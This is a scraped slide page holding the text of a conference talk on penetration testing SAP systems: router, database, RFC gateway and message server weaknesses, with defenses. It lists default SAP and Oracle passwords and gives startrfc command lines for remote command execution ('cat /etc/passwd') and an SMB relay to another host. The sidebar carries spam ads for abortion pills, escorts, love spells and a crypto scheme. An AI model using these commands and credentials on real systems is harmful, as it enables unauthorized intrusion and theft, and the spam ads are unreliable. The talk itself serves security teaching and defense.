+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...Health
 

Recently uploaded (20)

TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service provider
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
 
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
Define the academic and professional writing..pdf
Define the academic and professional writing..pdfDefine the academic and professional writing..pdf
Define the academic and professional writing..pdf
 
SHRMPro HRMS Software Solutions Presentation
SHRMPro HRMS Software Solutions PresentationSHRMPro HRMS Software Solutions Presentation
SHRMPro HRMS Software Solutions Presentation
 
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
 
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdfintroduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionIntroducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
 
Microsoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdfMicrosoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdf
 
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park %in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
 
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation Template
 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
 
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
 
The Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdfThe Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdf
 
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
 

Practical SAP pentesting (B-Sides San Paulo)

  • 1. Invest  in  security   to  secure  investments   Prac%cal  SAP   Pentes%ng   Alexander  Polyakov.  CTO  ERPScan  
  • 2. About  ERPScan   •  The   only   360-­‐degree   SAP   Security   solu%on   -­‐   ERPScan   Security   Monitoring  Suite  for  SAP   •  Leader  by  the  number  of  acknowledgements  from  SAP  (  150+  )   •  60+  presenta=ons  key  security  conferences  worldwide   •  25  Awards  and  nomina=ons   •  Research  team  -­‐  20  experts  with  experience  in    different  areas   of  security   •  Headquarters  in  Palo  Alto  (US)  and  Amsterdam  (EU)       2  
  • 4. Business  applica=on  security   All  business  processes  are  generally  contained  in  ERP  systems.    Any  informa)on  an  a<acker,  be  it  a  cybercriminal,  industrial  spy  or   compe)tor,  might  want  is  stored  in  a  company’s  ERP.     This  informa)on  can  include  financial,  customer  or  public  rela)ons,   intellectual  property,  personally  iden)fiable  informa)on  and  more.   Industrial  espionage,  sabotage  and  fraud  or  insider  embezzlement   may  be  very  effec)ve  if  targeted  at  a  vic)ms  ERP  system  and  cause   significant  damage  to  the  business.   4  
  • 5. Big  companies   5     Portal   HR   Logis%cs   Warehouse   ERP   Billing   Suppliers   Customers   Banks   Insurance  Partners   Branches   BI   Industry   CRM   SRM  
  • 6. SAP                         Вставьте  рисунок  на  слайд,  скруглите  верхний  левый  и  нижний  правый  угол   (Формат  –  Формат  рисунка),  добавьте  контур  (оранжевый,  толщина  –  3)   6   •  The  most  popular  business  applica%on   •  More  than  250000  customers  worldwide     •  83%  Forbes  500  companies  run  SAP   •  Main  system  –  ERP   •  3  Main  plasorms   • NetWeaver  ABAP   • NetWeaver  J2EE   • BusinessObjects  
  • 7. SAP  NetWeaver  ABAP   •  Main  plasorm   •  Base  plasorm  for:  ERP,SRC,CRM,PLM     •  Purpose:  Automate  business  processes     •  If  compromised:     –  Stopping  of  business  processes   –  Fraud   –  Industrial  espionage   7  
  • 8. SAP  NetWeaver  J2EE   •  Addi%onal  plasorm   •  Base  plasorm  for  IT  stuff.  Like:     –  SAP  Portal  ,  SAP  XI,  SAP  Solu%on  Manager,  SAP  Mobile,  SAP  xMII   •  Purpose:  Integra%on  of  different  systems     •  If  compromised:   –  Stopping  of  all  connected  business  processes   –  Fraud   –  Industrial  espionage   8  
  • 9. SAP  BusinessObjects   •  Addi%onal  plasorm   •  Base  plasorm  for  analy%cs   •  Mostly  business  oriented:   –  Business  Intelligence   –  GRC     •  If  compromised:   –  Fraud   –  Industrial  espionage   9  
  • 11. SAP  for  users   •  Client-­‐server  applica%on    SAP-­‐GUI  with  proprietary  DIAG   protocol   •  Main  func%ons  –  Transac%ons  executed  in  SAPGUI   •  Also  possible  to  call  special  background  func%ons  (RFC)   remotely   •  Possible  to  modify  code  of  transac%ons  or  RFC  func%ons  using   ABAP  language   •  Possible  to  use  web-­‐interfaces    like  Webdynpro  or    BSP  in  some   applica%ons  like  SRM     11  
  • 12. SAP  for  users   •  SAP  Landscape   –  Test,  Development,  Produc%on,  QA   •  SAP  Instance   –  Server  Instance,  Dialog  instance   •  Client   –  Default  clients   –  Client  separa%on     12  
  • 13. 13   DEMO  0:   Login  to  SAP  system.  
  • 14. 14   Introduc)on  to  SAP  Security  
  • 15. SAP  Security     •  Complexity      Complexity  kills  security.  Many  different  vulnerabili%es  in  all   levels  from  network  to  applica%on   •  Customiza=on    Can  not  be  installed  out  of  the  box.  They  have  many  (up  to  50%)   custom  codes  and  business  logic   •  Risky      Rarely  updated  because  administrators  are  scared  they  can  be   broken  during  updates  and  also  it  is  down%me   •  Unknown        Mostly  available  inside  a  company  (closed  world)       h}p://erpscan.com/wp-­‐content/uploads/pres/Forgo}en%20World%20-­‐%20Corporate%20Business%20Applica%on%20Systems%20Whitepaper.pdf   15  
  • 16. 16   0   100   200   300   400   500   600   700   800   900   2001   2002   2003   2004   2005   2006   2007   2008   2009   2010   2011   2012   2013   2014   By  2014    -­‐  2800  SAP  Security  notes   SAP  Security  notes  
  • 17. SAP  Pentes=ng  Features     •  Deeper  knowledge  of  ERP  than  normal  systems  required   •  ERP  systems  are  mission  cri%cal  and  cannot  be  accidentally   taken  down  (POC  exploits  too  dangerous)   •  Gaining  shell  /  command  exec  is  not  the  goal   –  Goal  is  access  to  sensi%ve  data  or  impact  to  business  processes       17  
  • 18. SAP  Pentes=ng  Features:  deeper  knowledge   •  Higher  difficulty  than  standard  pen  tests   •  Required  knowledge  of:   –  Business  processes   –  Business  logic   –  Exploit  tes%ng  impact  risk  assessment   –  High  end  databases   –  Numerous  (some%mes  esoteric)  opera%ng  systems   –  Different  hardware  plasorms   –  Common  custom  implementa%ons       18  
  • 19. SAP  Pentes=ng  Features  :  Exploita=on   •  Exploit  code  for  ERP  not  easy  to  develop     •  Payloads  have  to  be  adapted   –  Numerous  hardware,  OS,  release  version,  and  db  systems  to  generate   payloads  for   –  In  some  causes  up  to  50  different  shellcode  varia%ons   •  Building  a  test  environment  nearly  impossible   –  Takes  an  expert  a  week  to  properly  install  each  varia%on   –  A  year  to  build  a  comprehensive  test  environment       19  
  • 20. SAP  Pentes=ng  Features  :  Shell   •  A  be}er  approach  required  with  focus  on   –  Architecture   –  Business  Logic   –  Configura%on     –  You  will  get  administrators  access  to  business  data   •  Rather  than   –  Program  or  Memory  Vulnerabili%es   –  You  will  probably  gain  access  to  OS  and  then  need  to  obtain  access  to   Applica%on       20  
  • 21. SAP  Security  areas   21   Code  security   Business  security  (SOD)   Infrastructure  security  (Network,OS,Database)   Applica%on  plasorm  security   Legal  user  required   Legal  user  not  required  
  • 22. SAP  Security  areas   22   Code  security   Business  security  (SOD)   Infrastructure  security  (Network,OS,Database)   Applica%on  plasorm  security   Legal  user  required   Legal  user  not  required  
  • 23. Methodologies:  EAS-­‐SEC     •  Enterprise  Applica%on  Security  Project     •  Found  in  2010   •  Published  concept  and  top10  issues  for  different  areas     •  Version  2  in  2004     Published  compliance  for  SAP  NetWeaver  ABAP     h}p://erpscan.com/publica%ons/the-­‐sap-­‐netweaver-­‐abap-­‐plasorm-­‐vulnerability-­‐assessment-­‐guide/       Exists  to  provide  guidance  to  people  involved  in  the    procurement,  design,  implementa)on  or  sign-­‐off     of  large  scale  (i.e.'Enterprise')  applica)ons.     h}p://www.owasp.org/index.php/OWASP_Enterprise_Applica%on_Security_Project       23  
  • 24. 24   Network  level  security  
  • 25. Network  Security  Agenda   Top  10  Network/Architecture  issues  by  EAS-­‐SEC       1.  Lack  of  proper  network  filtra=on  between  SAP  and  Corporate   network   2.  Lack  or  vulnerable  encryp=on  between  corporate  network   and  SAP   3.  Lack  of  separa=on  between  TST  DEV  and  PRD  system   4.  Lack  of  encryp%on  inside  SAP  Network   5.  Insecure  trusted  rela%ons  between  components   6.  Insecure  configured  Internet  facing  applica=ons     7.  Vulnerable  /  default  configured  Gateways   8.  lack  of  frontend  access  filtra%on   9.  Lack  or  misconfigured  monitoring  IDS/IPS   10.  Insecure  /  inappropriate  wireless  communica%ons     25  
  • 26. Network  Security  at  glance   It  is  mostly  about:   •  Network  filtra%on  (ACL)   •  Protocol  security  (Encryp%on)   •  Securing  Internet  access  (SAP  Router)     26  
  • 27. Network  filtra=on   27   Almost  every  listed  applica%on    have  vulnerabili%es  and   misconfigura%ons  that  can  be  used  to  gain  access  to  SAP     h}p://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/4e515a43-­‐0e01-­‐0010-­‐2da1-­‐9bcc452c280b?QuickLink=index&overridelayout=true    
  • 28. 28   DEMO  1:   Nmap  scan  of  SAP  
  • 29. Why  cri=cal?   •  Administra%ve  SAP  services  can  have  direct  Internet  access   •  Even  if  you  sure  that  not   •  To  prove  in  we  run  “SAP  Security  in  Figures  report”   •  All  of  possible  services  were  found  at  least  once     29   Myth:  SAP  systems  a6acks    available  only  for  insiders  
  • 30. Why  cri=cal?   30   About  10000  systems  including:    Dispatcher,  Message  server,  SapHostcontrol,  Web-­‐  services  
  • 31. Protocol  security   31   So`     Port     Protocol   Pass  encr   Data  encr   Mi=ga=on   SAPGUI   32<SN>   DIAG   Compession  (can  be   decompresssed)   Compression  (can  be   decompressed)   SNC   WEBGUI   80<SN>   HTTP   Base64   no   SSL   RFC   33<SN>   RFC   XOR   no   SNC   Message  server   36<SN>   No   no   SNC     Visual  Admin   5<SN>04   P4   Prorietary  (broken)   Prorietary  (broken)     SSL   IIOP   5<SN>07   J2EE  Telnet   5<SN>08   No   No     VPN/Disablse     LogViewer   5<SN>09   prorietary   md5   No   NO   MMC   5<SN>13   HTTP   Base64   no   SSL  
  • 32. 32   SAP  Router  security  
  • 33. SAP  Router   SAP  Router  –  reverse  proxy  server:   •  Transmit  connec%ons   –   From  internet  lo  company   –   From  SAP  AG  to  company   –   Between  networks   –   Between  clients/partners   •  Listen  by  default  port  3299   •  Can  be  installed  in  windows/linux   •  Support  encryp%on  (SNC)  and  ACL     33  
  • 34. SAP  Router  bug  1  (Table  bypass)   There  is  an  ACL  table  to  prevent  unauthorized  access   •  D    172.16.0.1                          192.168.1.1        22   •  P      172.16.0.4                        192.168.1.1        3301              passwd   •  S      172.16.0.5                          192.168.1.1        *                          passwd   •  .   •  .   •  .   •  KP                              *                                192.168.1.1      8000   •  P                                      *                                                  *                                  *   34  
  • 35. SAP  Router  bug  2  (non  SAP  services)   •  Some%mes  administrators  use  SAPRouter  also  for  rou%ng  other   protocols   •  It  is  possible  to  connect  any  port   •  In  old  versions  *  means  any  port  is  allowed   •  In  new  versions  *  means  any  SAP  port  is  allowed     •  P    172.*.*.*                              *        3389   •  P      *                                                          *        telnet                 35  
  • 36. SAP  Router  bug  3   •  Informa%on  disclose  about  router  table   •  If  router  configured  with  special  parameter  –I   •  Router  table  can  be  remotely  disclosed   •  In  real  world  ~20%  of  routers  configured  in  such  way   36  
  • 37. SAP  Router  bug  4  (DOS)   •  If  you  found  informa%on  disclose   •  Or  brute  for  at  least  one  service  which  can  be  accessed  thought   SAP  Router     •  You  can  run  DOS  a}ack  on  SAP  Router   •  By  default  router  pool  limited  to  3000  connec%ons   •  In  1  minute  you  can  disable  SAPRouter   37  
  • 38. SAP  Router  bug  5  (full  access)   •  Auth  bypass   •  If  router  configured  with  special  parameter  -­‐x   •  Router  can  be  remotely  reconfigured   •  In  real  world  ~8%  of  routers  configured  in  such  way!       38  
  • 39. SAP  Router  bug  6  (Memory  corrup=on)   •  Memory  corrup%on  issue  were  found  by  ERPScan  team   •  Remote  compromise  without  authen%ca%on   •  Cant  disclose  details  now     •  85%  vulnerable  NOW!         39  
  • 40. 40   Database  level  security  for  SAP  systems  
  • 41. Database  Security  Agenda   •  Cri%cal  database  data   •  A}acking  Database   •  From  database  to  SAP   •  Securing  Database     41  
  • 42. Cri=cal  database  data   •  We  are  interested  in  data  that  can  help  us  to  get  into  SAP   •  Data  stored  in  tablespace  SAPR3  or  SAP<SID>   •  Interes%ng  tables:      USR02  —  password  hashes      SSF_PSE_D  —  SSO  keys        RFCDES  –  passwords  for  RFC  connec%ons        ICFSERVLOC  –  passwords  for  ICF  services      REPOSRC  –  ABAP  programs     42  
  • 43. Afacking  Database  (OWASP-­‐EAS)   Top  10  OS  Issues  by  OWASP-­‐EAS   1  Default  passwords  for  DB  access   2  Lack  of  DB  patch  management   3  Unnecessary  Enabled  DB  features     4  lack  of  password  lockout/complexity  checks   5  Unencrypted  sensi%ve  data  transport  /  data   6  Lack  or  misconfigured  network  access  control   7  Extensive  user  and  group  privileges   8  lack  or  misconfigured  audit   9  Insecure  trust  rela=ons   10  Open  addi%onal  interfaces   43   SAP  Specific   SAP  Specific   SAP  Specific  
  • 44. Afacking  Database  (OWASP-­‐EAS)   •  Oracle  is  s%ll  most  popular  database  for  SAP   •  By  default  listen  port  1527   •  Common  a}acks:   –  Default  Oracle  passwords   –  Simple  passwords  bruteforce   –  Protocol  vulnerabili%es  (overflows)   –  Listener  a}acks  (remote  registra%on  of  log)   44   Direct  access  to  Database  =  full  SAP  compromise  
  • 45. •  Default  SAP’s  database  users/passwords   –  SAPR3/SAP   •  Default  Oracle  database  users/passwords   –  SYS/CHANGE_ON_INSTALL   –  SYSTEM/MANAGER   –  SCOTT/TIGER   –  DBSNMP/DBSNMP   45   Default  passwords  
  • 46. •  Oracle  configura%on  REMOTE_OS_AUTHENT   •  If  set  to  TRUE  oracle  trusts  remote  system  for  connec%ng  to   listener   •  Remote  user  must  have  <SID>ADM  name   •  No  need  for  password  or  anything  else!     46   Misconfigured  access  control    
  • 47. 47   Misconfigured  access  control    
  • 48. From  database  to  SAP   •  Connect  using  OPS$<SID>ADM   •  Select  encrypted  password  from  SAPUSER  table   •  Decrypt  it  (DES  with  known  key  BE_HAPPY)   •  Connect  to  SAP  using  user  SAPR3/SAPSR3/SAPSR3DB   •  Selec%ng  user  hashes  from  SAP<SID>.usr02  table   •  Brute  hashes  using  JohnTheRipper   48  
  • 49. Oracle  Security  Defense   •  Close  port  1527  from  everything  but  SAP   •  Secure  listener  by  password   •  Configure  password  policies   –  FAILED_LOGIN_ATTEMPTS   –  PASSWORD_VERIFY_FUNCTION   •  Change  default  passwords   •  Encrypt  data  transfer   •  Enable  SQL  Audit  at  DB       49  
  • 50. 50   SAP  Applica)on  plaUorm  security  
  • 51. SAP  NetWeaver     51  
  • 52. 52   SAP  Frontend    security  
  • 53. Why  Afack  users   •  Users  are  less  secure     •  There  are  thousands  SAP  users  in  one  company     •  You  can  a}ack  them  even  if  Server  is  fully  secured   •  You  can  a}ack  them  from  outside     •  You  can  use  them  as  proxy  for  a}acking  servers       53  
  • 54. Typical  Client  So`ware  for  SAP   •  SAPGUI   •  JAVAGUI     •  WEBGUI     •  NWBC           •  RFC     •  Applica%ons  such  as  VisualAdmin,  Mobile  client  and  many-­‐many   other         54  
  • 55. Typical  Client  So`ware  for  SAP     55   Date   Vulnerable   Component Author Vulnerability Link 04.01.2007 Rfcguisink  Mark  Litchfield   BOF h}p://www.ngsso–ware.com/advisories/high-­‐risk-­‐vulnerability-­‐in-­‐ enjoysap-­‐stack-­‐overflow/   04.01.2007 Kwedit  Mark  Litchfield BOF h}p://www.ngsso–ware.com/advisories/high-­‐risk-­‐vulnerability-­‐in-­‐ enjoysap-­‐stack-­‐overflow/ 07.11.2008 Mdrmsap  Will  Dormann     BOF h}p://www.securityfocus.com/bid/32186/info 07.01.2009 Sizerone  Carsten  Eiram BOF h}p://www.securityfocus.com/bid/33148/info 31.03.2009 WebWiewer3D  Will  Dormann     BOF h}p://www.securityfocus.com/bid/34310/info 15.04.2009 Kwedit Carsten  Eiram Insecure  Method h}p://secunia.com/secunia_research/2008-­‐56/ 08.06.2009 Sapirrfc  Alexander  Polyakov  (DSecRG) BOF h}p://dsecrg.com/pages/vul/show.php?id=115 28.09.2009 WebWiewer3D Alexander  Polyakov  (DSecRG) Insecure  Method h}p://dsecrg.com/pages/vul/show.php?id=143   28.09.2009 WebWiewer2D Alexander  Polyakov  (DSecRG) Insecure  Method h}p://dsecrg.com/pages/vul/show.php?id=144    07.10.2009 VxFlexgrid  Elazar  Broad  ,    Alexander  Polyakov  (DSecRG) BOF h}p://dsecrg.com/pages/vul/show.php?id=117 23.03.2010 BExGlobal Alexey  Sintsov  (DSecRG) Insecure  Method h}p://dsecrg.com/pages/vul/show.php?id=164 unpublished Kwedit   Alexander  Polyakov,  Alexey  Troshichev     (DSecRG) Insecure  Method h}p://dsecrg.com/pages/vul/show.php?id=145   14.12.2010   RFCSDK  Alexey  Sintsov  (DSecRG) Memory  Corrup%on h}p://dsecrg.com/pages/vul/show.php?id=169   14.12.2010  RFCSDK  Alexey  Sintsov  (DSecRG) Format  String h}p://dsecrg.com/pages/vul/show.php?id=170   unpublished    DSECRG-­‐00173  Alexander  Polyakov  (DSecRG) Insecure  Method later 22.12.2010 NWBC Alexey  Sintsov  (DSecRG) Memory  Corrup%on h}p://dsecrg.com/pages/vul/show.php?id=210
  • 56. Implementa=on  fails     •  Distribu%ves  usually  stored  on  shared  folder     •  If  you  can  gain  this  access  it  is  possible  to  overwrite  dll’s   •  Or  modify  configura%on  file  with  BOF  issues.   •  Or  overwrite  configura%on  files  with  fake  SAP  server       56  
  • 57. 57   SAP  NetWeaver  –  Applica)on  server  services  
  • 58. SAP  NetWeaver:  main  components   •  NetWeaver  Applica=on  Server  ABAP   –  SAP  Gateway   –  SAP  Message  server   –  SAP  Message  server  HTTP   –  SAP  Dispatcher   –  SAP  ICM   –  SAP  MMC   –  SAP  HostControl   •  NetWeaver  Applica=on  Server  JAVA   –  HTTP  Server   –  SAP  Portal   58  
  • 59. 59   SAP  Gateway  security  
  • 60. SAP  NetWeaver     60  
  • 61. SAP  Gateway   SAP  Gateway  also  called  Applica=on  Server.   •  One  of  the  core  SAP  services   •  Allows  interac%on  with  remote  SAP  systems  and  also  with  other   systems   •  Manages  the  communica%on  for  all  RFC  based  func%onality   –  Gateway  monitor  (Administra%on  )   –  Gateway  Reader  (  RFC)     –  Gateway  work  process  (  logging  )         61   h}p://scn.sap.com/people/ma}.kangas/blog/2009/03/03/sap-­‐netweaver-­‐executables  
  • 62. Gateway  Monitor   •  Gateway  Monitor   •  Access  for  analyzing  gateway  process   •  You  can  specify  3  op%ons  for  security   –  Gw/monitor=0  forbidden  access   –  Gw/monitor=1  only  local  access  (default  now)   –  Gw/monitor=2  local  and  remote  access  (default  before  6.2)       62  
  • 63. Gateway  Monitor   •  If  Gw/monitor=2    it  is  possible  to  run  cri%cal  commands  and   obtain  some  informa%on    remotely   •  Remote  monitoring  can  be  done  by  GWMON  tool   •  Stored  in  /usr/exe/   •  Example:    gwmon  -­‐gwhost  127.0.0.1  -­‐gwserv  3200       63  
  • 64. 64   DEMO  9:   Playing  with  GWMON  
  • 65. Gateway  RFC    (3  types)     •  ABAP  RFC       –  client  call  SAP-­‐server   •  Registered  RFC  Server  Program     –   Client  call  addi%onal  programs    installed  on  Other  servers  via  Gateway       •  Started  RFC  Server  Program   –   Client  call  addi%onal  programs      that  installed  on  SAP-­‐server       65  
  • 66. ABAP  RFC  -­‐  overview   •  Most  commonly  used   •  It  is  like  windows  RPC   •  User  can  call  ABAP  remote-­‐enabled  func%ons     •  need  to  know:     –  System  id   –  Client   –  userid   –  password       •  There  are  about  30000  different  RFC  func%ons    in  different   groups             66  
  • 67. ABAP  RFC  -­‐  execu=ng   How  to  call  RFC  func=on  remotely?   •  Use  default  tool  usrsapERPSYSexerunstartrfc   •  Use  default  creden%als  or  exis%ng  user  creden%als     Example:                  >Startrfc.exe  -­‐3  –h  172.16.0.222  –s    01  –c    800  –F  RFC_PING  -­‐t     Don’t  miss  parameters  order  because  you  will  get  errors!             67  
  • 68.  ABAP  RFC  –  Anonymous  RFC’s     •  Check  If  func%on  can  be  accessed  anonymously   •  There  are  some  func%ons  that  can  be  executed  anonymously   –  RFC_PING  –  just  check  connec%on   –  RFC_SYSTEM_INFO     –  RFC_GET_LOCAL_DESTINATIONS   –  RFC_GET_LOCAL_SERVERS   –  SYSTEM_INVISIBLE_GUI             68  
  • 69. 69   DEMO  10:   ABAP  RFC  –  informa)on  disclose  issues  
  • 70. Default  creden=als   They  can  be  used  to  run  RFC  func%ons  remotely       70   USER   PASSWORD   Client   SAP*   06071992,  PASS   000,001,066,Custom   DDIC   19920706   000,001,Custom   TMSADM   PASSWORD,  $1Pawd2&   000   SAPCPIC   ADMIN   000,001   EARLYWATCH   SUPPORT   066  
  • 71. 71   DEMO  11:   ABAP  RFC  –  user  crea)on  
  • 72. ABAP  RFC  afacks  (SMBRELAY)   •  EPS_DELETE_FILE  –  no  addi%onal  auth  checks  inside!   •  EPS_CLOSE_FILE   •  CLBA_CLASSIF_FILE_REMOTE_HOST   •  CLBA_UPDATE_FILE_REMOTE_HOST   •  EDI_DATA_INCOMMING   •  RZL_READ_FILE   •  50  more…..     Example:   >Startrfc.exe -3 –h 172.16.0.222 –s 01 –t -F EDI_DATA_ICOMING –E PATHNAME= 172.16.0.101ERPScan -E PORT=SAPID3 –u SAPCPIC –p admin         72  
  • 73. ABAP  RFC  afacks  (Command  execu=on)   •  SXPG_CALL_SYSTEM  (any  command  using  vulnerability)   Example:   Startrfc.exe  -­‐3  -­‐h  172.16.0.222  -­‐s    01     -­‐F  SXPG_COMMAND_EXECUTE   -­‐E  COMMANDNAME=TYPE   -­‐E  ADDITIONAL_PARAMETERS=  cat/etc/passwd     -­‐u  SAPCPIC   -­‐p  admin   73  
  • 74. 74   DEMO  12:   ABAP  RFC  –  remote  command  execu)on  
  • 75. Gateway  Defense   •  Secure  GW/monitor   •  Enable  Secinfo  and  Reginfo  ACL  (don’t  use  *)   •  Patch  for  latest  RFC  security  bypasses  rfc/reg_no_conn   •  Restrict  access  to  dangerous  RFC  func%ons   •  Enable  GW/logging       75  
  • 76. 76   SAP  Message  Server  security  
  • 77. SAP  NetWeaver     77  
  • 78. SAP  Message  Server  -­‐  overview   •  The  SAP  Message  server  provides  two  services.     –  manages  SAP  communica%on  between  the  applica%on  servers  of  one   SAP  system.     –  provides  load-­‐balancing  informa%on  to  clients  like  the  SAP  GUI.     •  Before  7.0  listens  one  port  for  both  services     •  Since  7.0  default  installa%ons  automa%cally  split  into   –   internal  port  (used  for  applica%on  server  connec%ons)   –   external  port  (used  for  user  connec%ons).   •   This  is  defined  via  profile  parameters     –  rdisp/mshost,  -­‐  host   –  rdisp/msserv,  -­‐  port   –  rdisp/msserv_internal  must  be  !=0       78  
  • 79. SAP  Message  Server  -­‐  afacks   Why  should  we  make  2  ports  for  SAP  MS?   •  A}acker  can  register  fake  applica%on  server  on  message  server   •  By  default  it  is  possible  without  authen%ca%on   •  He  can  make  MITM  and  sniff  client  connec%ons       79  
  • 80. SAP  Message  Server  -­‐  ACL   •  Even  if  you  restrict  access  to  message  server  from  GUI  clients     •  Applica%on  servers  can  access  it   •  Ms/acl_info  can  be  used  to  list  approver    app  servers   •  The  entries  must  have  the  following  syntax:   HOST=[*| ip_adr | host_name | Subnet_mask | Domain ] [, ...] Examples for valid entries are: HOST = * (all hosts are allowed) HOST=host1,host2 (Logons allowed from host1 and host2) HOST=*.sap.com (all hosts in the sap.com domain can log on) HOST=147.45.56.32 (hosts with this IP address can log on) HOST=147.45.56.* (hosts with this subnet can log on)     80  
  • 81. Message  Server  monitoring   •  SAP  Message  server  Monitoring     •  Can  remotely  get  informa%on  about  message  server     –  check  and  change  all  the  important  se›ngs   –  create  and  view  traces   –  read  sta%s%cs   •  Managed  by  ms/monitor  op%on   •   if  ms/monitor  =1  and  ms/admin_port  !=0  anybody  can  get   remote  access  by  using  “msmon”  tool     h}p://help.sap.com/saphelp_nw04/helpdata/EN/64/3e7œ4a12e49b9856bb97970c6acc1/frameset.htm   81  
  • 82. 82   DEMO  15:   Playing  with  MSMON    
  • 83. Message  server  -­‐  defense   •  Disable  ms/monitor   •  Enable  ms/acl_info  and  manage  ACL   •  Enable  ms/admin_port                     h}p://help.sap.com/saphelp_nw04/helpdata/en/40/c235c15ab7468bb31599cc759179ef/frameset.htm   83  
  • 84. 84   SAP  Message  Server  HTTP  
  • 85. Message  server  HTTP  -­‐  info   •  Message  Server  HTTP   •  Just  simple  HTTP  service  with  informa%on   •  There  is  no  need  to  have  this  service     •  Informa%on  disclose  vulnerability  exist:   –  Read  details  about  connected  instances   –  Read    SAP  parameters                   85  
  • 86. 86   DEMO  16:   Message  Server  HTTP  –  parameter  disclosure  
  • 87. 87   SAP  NetWeaver  ICM  Security  
  • 88. SAP  NetWeaver     88  
  • 89. Agenda     •  History  of  SAP  web  applica%ons  and    ITS   •  ITS  vulnerabili%es   •  ICM  architecture   •  ICM  vulnerabili%es   •  ICM  Defense       89  
  • 90. ICM  (Cri=cal  services)   More  than  1500  services  which  can  execute  cri%cal  func%onality   •  Every  registered  user  can  get  access  to  them  by  default   –  Most  services  require  authen%ca%on   –  You  can  use  any  of  defaults  to  a}ack   –  By  default  all  ICF  services  are  not  assigned  to  any  Authoriza%on  value   –  ANY  user  can  execute  any  ICF  service    (If  there  is  no  addi%onal  auth  checks  in  code  )   –  There  are  many  cri%cal  services  which  can  be  used  by  unprivileged  user   to  escalate  privileges   •  Also  there  are  about  40  anonymous  services  (Transac%on  SICF)       90  
